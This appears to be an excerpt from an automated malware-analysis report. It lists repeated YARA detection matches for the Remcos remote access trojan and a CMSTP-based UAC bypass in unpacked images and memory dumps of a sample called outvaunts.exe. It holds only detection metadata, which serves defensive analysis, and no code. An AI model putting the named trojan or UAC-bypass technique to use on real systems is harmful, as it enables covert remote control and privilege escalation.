              Source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
